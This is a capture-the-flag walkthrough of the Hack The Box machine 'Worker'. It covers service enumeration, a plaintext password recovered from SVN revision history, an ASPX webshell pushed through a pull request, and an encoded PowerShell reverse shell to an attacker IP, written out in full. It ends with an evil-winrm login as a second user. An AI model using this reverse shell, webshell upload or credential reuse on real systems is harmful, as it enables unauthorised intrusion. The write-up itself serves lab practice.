Hack The Box - Worker Walkthrough without Metasploit

Worker: Windows box rated as Medium. We will face a SVN repository, with a bit of enumeration we will be able to enter in the box and then using SVN Pipelines we will gain Administrator access.

Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-p- Scan all ports

nmap -sC -sV -p- 10.10.10.203

Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

But as always, when we encounter a web page, we run gobuster against it:

gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e

We didn't get much from this port (also ran the command with bigger wordlists and -x to add some common windows extensions such as asp or aspx along with jsp, html, php, db, txt, xml but we got no luck either)

Svn

There's a svn Subversion, running on port 3690.

Subversion: Is a VCS (Version Control System)... it's "like" Git with some differences...

Centralized instead of distributed

You must be connected to make commits

Each user can have just one copy of the trunk

Branching or merging is... well quite time-consuming

Maybe that's why less than 10% of the professional devs use it... and i guess those that use it are because they are forced to...) But it came like 5 years before Git. In case someone wants to know a bit more about it:

Checkout

We are going to checkout whatever repository we have there:

svn checkout svn://10.10.10.203

The most interesting file here is moved.txt:

We found a new Host to add to our /etc/hosts:

sudo nano /etc/hosts

Now we can try to access that url:

Gathering info from SVN

So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:

svn info

We got the Revision number, which is 5 and the name of a user nathen.

SVN diff

The revision number is actually really important, this means we can compare this revision to the previous four and see if there are some differences:

svn diff -r <Revision Number>

The only change is the moved.txt that we saw before, let's try a different revision:

We can confirm the user nathen and... was there some password in plain text!? We have to take a look at Revision 2:

Repository

Now we have a user nathen and password wendel98, if we try to use it on http://devops.worker.htb

Clicking on SmartHotel360 will take us to the following page:

Here we can see the Repositories:

Exploitation

We are going to try and use the SVN repository to gain access to the box, in order to do so we must be able to make some changes to master and upload a page that allow us to execute commands on the machine, since it's IIS 10.0 the page has to be either asp or aspx.

Foothold

Tried to commit directly on master, but we were unable to do so, we are going to create a new branch, make some changes and then do a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

Click on our new created branch:

Now upload a cmdasp.aspx (We have one ready to use in our Kali located on '/usr/share/webshells/aspx/cmdasp.aspx')

Click on Upload File(s), browse... and then select our cmdasp.aspx:

We also have to link a work item to the commit:

Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.

We have to click on Create a pull request (we can see it on the commit id on the previous picture).

Create a New Pull Request of our evilbranch into master, selecting Nathalie (our user) as Reviewer:

If we take a long time to do this process, we may face this problem:

In order to avoid it we have to prepare what we want to do and do it as fast as possible, now we have to repeat the process and will have to use another branch name too.

Once we are back at this point, we have to approve the commit:

And Set auto-complete:

It will automatically complete the pull request

If we go to the master branch now, we should be able to see our cmd page there:

If we look closely, we will see next to master there is a subdomain name spectral so in order to access our new feature we need to add that to our /etc/hosts:

Now if we try to access our new feature:

It was deleted, we really have to move fast in order to be able to get access to this machine it seems. So, we are going to prepare all the steps now, the cmdasp.aspx and the command we will use on it to gain access, which will be an encoded reverse.ps1 script.

We prepare an encoded reverse powershell script

Reverse Powershell script:

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..655535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

We encode it with our PSEnconder.py:

python3 PSEncoder.py /path/to/our/reverse.ps1

Now on the command shell we have in the page we enter the encoded powershell script with the following arguments

-Exec ByPass

-Nol

-Enc

PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>

Have a netcat listening on the port indicated and click on execute:

Internal Enumeration

First let's take a look at the user we are after:

We can see there are more than one volume on this box:

If we go into that volume and take a look around, we will see a passwd file under svnrepos/www/conf

Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

evil-winrm -i <ip> -u <user> -p <password>

We are in as robisl and we can grab our user flag, now let's try to escalate privileges, in order to do that we are going to try and access the repository as robisl.